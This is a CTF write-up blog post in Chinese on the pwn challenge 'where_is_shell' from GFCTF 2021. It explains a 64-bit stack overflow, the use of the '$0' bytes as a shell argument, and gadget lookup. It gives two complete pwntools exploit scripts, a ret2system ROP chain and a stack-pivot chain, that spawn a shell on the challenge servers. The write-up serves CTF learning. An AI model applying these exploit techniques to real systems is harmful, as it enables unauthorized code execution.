NSSCTF刷题笔记pwn9——[GFCTF 2021]where_is_shell

已于 2024-02-02 17:58:19 修改
阅读量483 收藏
点赞数 3
分类专栏: pwn 文章标签: 笔记
于 2024-02-02 16:47:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135996124
版权

main函数,存在很明显的栈溢出

有system函数,但是不存在/bin/sh字符串

存在一个提示函数,代码报红,说明存在问题,看一下机械码

可以看到\x24 \x30对应的是$0

$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541

然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中

首先使用ROPgadget获取pop rdi的地址

找到地址 0x4005e3

然后我们还需要一个ret的地址,否则本地能打通,远程打不通

from pwn import *
context(arch='amd64')

#io = process('./shell')
io = remote('node4.anna.nssctf.cn',28129)
elf = ELF('./shell')

system_plt = elf.plt['system']
bin_sh = 0x400541
pop_rdi_ret = 0x4005e3
ret_addr = 0x400416

payload = flat([b'A'*24,ret_addr,pop_rdi_ret,bin_sh,system_plt])

io.sendline(payload)
io.interactive()

还有一种做法是栈迁移,可以学习一下别人写的exp脚本

from pwn import *

context.endian = 'little'
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'
io = remote('1.14.71.254', 28644)
elf = ELF('/root/Desktop/shell')

io.recvuntil(b'zltt lost his shell, can you find it?\n')
fake_addr = 0x601a00
pop_rsi_r15_ret = 0x004005e1
pop_rdi_ret = 0x004005e3
ret = 0x00400481

payload = b'a' * 0x10 + p64(fake_addr) + p64(pop_rsi_r15_ret) + p64(fake_addr) + p64(0) + p64(0x00400572)
io.send(payload)

payload = b'/bin/sh\x00' + p64(pop_rdi_ret) + p64(fake_addr) + p64(ret) + p64(elf.sym['system'])
io.send(payload)

首先吧rbp栈底的地址丢到了fake_addr

然后将rsi写入fake_addr的地址作为第二个参数,然后调用read函数

接着在read函数在fake_addr上写入/bin/sh

然后将faker_addr传入rdi中

最后调用system函数

qq_45692883
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
[GFCTF 2021]where_is_shell
m0_73756460的博客
03-23 498
NSS刷题 [GFCTF 2021]where_is_shell【write up】
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 3055
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
GFCTF 2021 where_is_shell
2301_79793667的博客
04-09 283
要构造的payload就是首先需要覆盖返回地址,使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0)。发现定义了一个字符串buf,距栈底距离为0x10,并且有一个read函数,再检查附件其他内容并没有发现bin/sh,但是发现了一个tips,跳转到该地址进行查看。只需要取它地址后一位就可以了也就是取到0x400541就能得到$0的机器码。
[GFCTF 2021]文件查看器(GZ、过滤器、phar) day4
qq_62046696的博客
05-10 616
打开界面直接一个登录界面,直接admin/admin登录进去。进来之后发现是一个文件查看器的功能随便输入了点东西发现了报错,然后读取文件的功能,输入Files.classs.php发现读取不成功换了个index.php大概的意思就是new 传入一个类,然后调用类中的方法,推断肯定有别的源码,果断扫目录发现www.zip,里面有几个php文件,然后可以看到每个类中都有几个魔法函数,说明肯定是用他们一起然后构造一个pop链,大致拼接了一下这里有一个点就是)();
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
[GFCTF 2021] day2
qq_62046696的博客
05-07 888
template需要就是传进去index.html,这样才会调用listdata这个方法。--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?发现会调用listdata方法并且需要我们传参 action module。$dir需要是admin,是space传进来的,所以space=admin。/template/admin/ 首先代码中有这一个目录,访问看一下是啥。template也就是filename需要是 index.html。则需要满足 $p存在也就是,在这里需要一个键和值,
GFCTF2021-where_is_shell
最新发布
sagic的博客
07-17 217
总而言之我们现在要构造的payload就是首先需要覆盖返回地址,然后使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0),因为rdi是64位传参中最先传输的。利用system($0)获得shell权限。正好tips函数中有我们需要的机器码。$0在机器码中为 \x24\x30。
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9472
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3344
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
bugku pwn4 学习
欢迎来到神林的博客
08-27 1171
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2213
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
2021GFCTF
unexpectedthing的博客
07-07 1568
GFCTF2021
蓝帽杯CTF2021 pwn解
qq_39948058的博客
08-26 453
一、slient 一道原题,直接付出脚本进行打 from pwn import * EXCV = context.binary = './chall' e = ELF(EXCV) if args.I: context.log_level = 'debug' def pwn(p, index, ch): # open shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop
GFCTF2021 部分WP
mumuzi的博客
11-21 4484
只写我做了的 SignIn GFCTF2021 回复GFCTF,得到base64解码即可 GFCTF{W3lc0me_t0_th3_12th_GFCTF} Misc 重生之我在A国当间谍 secret是PDU编码之后的,一句一句的解就行http://www.sendsms.cn/pdu/ 当然这里不是很多,如果是很多的话可以调用控制台来批量解密 倒数第二句:真让人无语。我把密码告诉你,记住,这个密码不要告诉任何人。WzFlNHJsMFwvZQ== 得到密码 [1e4rl0/e 解压出来是一张被撕毁的二维码
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值